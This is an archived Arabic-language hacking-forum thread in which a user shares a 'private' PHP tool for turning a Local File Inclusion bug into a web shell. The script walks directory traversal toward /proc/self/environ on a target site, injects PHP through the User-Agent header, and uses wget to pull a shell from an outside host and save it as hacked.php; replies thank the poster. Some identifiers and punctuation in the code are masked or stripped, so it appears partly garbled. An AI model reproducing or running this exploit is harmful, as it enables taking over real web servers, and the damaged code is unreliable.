:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Uploading Shell Through Local File Inclusion ( LFI ) priv8 (http://www.vbspiders.com/vb/t16743.html)

D4rK 08-03-2009 06:19 AM
Uploading Shell Through Local File Inclusion ( LFI ) priv8
 
1 مرفق
مرحبا

شباب اداة برايفت واحد اجنبي صاحبي مبرمجها

الشب قرر ينزلها

بس مش حتلاقوها ولا محل غير هون

و الشب اسمو بلاك دريم وهو اجنبي يعني مش علااء المصري يلي منعرفو :a07:

كود PHP:
 <?php

//Get Shell Via LFI(Local File Inclusion)
//Copyright BlackDream 2009 
//mr.pr0n you are the best boy


//edit this if you want. Linux Command
$cmd "<?php system(\"wget http://testsite.li/components/shell.txt; mv shell.txt hacked.php\");?>";
$site "http://www.thesite.com/index.php?page="//enter it like http://www.thesite.com/index.php?page=
$proc_path "proc/self/environ"//without first slash


//Do not edit below this line

preg_match"@^(http://.*?)(/|$)@"$site$matches );

$path "";
$i 0;

while ( )
{
    if ( $i >= 20 )
        break;

    $path .= "../";
    $source page_get_*******( $site $path $proc_path );
    if ( strstr($source'********_ROOT') != false )
    {
        exit( "\nShell Uploaded With Success -> " $matches[1] . '/' "hacked.php" );
    } else
        echo "\nFail at state " $i "\n";
    $i++;
}

function page_get_*******( $url )
{
    global $cmd;
    $ch curl_init$url );
    curl_setopt$chCURLOPT_RETURNTRANSFERtrue );
    curl_setopt$chCURLOPT_HEADER);
    curl_setopt$chCURLOPT_USERAGENT$cmd );
    curl_setopt$chCURLOPT_CONNECTTIMEOUT);
    curl_setopt$chCURLOPT_TIMEOUT);
    $ret curl_exec$ch );
    curl_close$ch );
    return $ret;
}

?>

The Final Doom 08-03-2009 06:45 AM
تسلم يا حج دآرك على الثغرة بس يا ريت تضعها في ملف تكست أحسن

D4rK 08-03-2009 06:47 AM
تم عماد + الي مش فاهم شو هذا

هذا سكربت لثغرات الـ LFI الي بتخليك تقرا ملفات السيرفر .. تصير ترفع شل =]

الكل كان مفكر هل ثغرات ما لها فائدة بس هي هون صارلها فايدة

تحياتي

Tn-Sn!PeR 08-22-2013 05:43 PM
رد: Uploading Shell Through Local File Inclusion ( LFI ) priv8
 
سلمت يداك يا غالي على السكريبت

mimo-dz 12-09-2018 01:50 AM
رد: Uploading Shell Through Local File Inclusion ( LFI ) priv8
 
شكرا لك


الساعة الآن 01:36 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0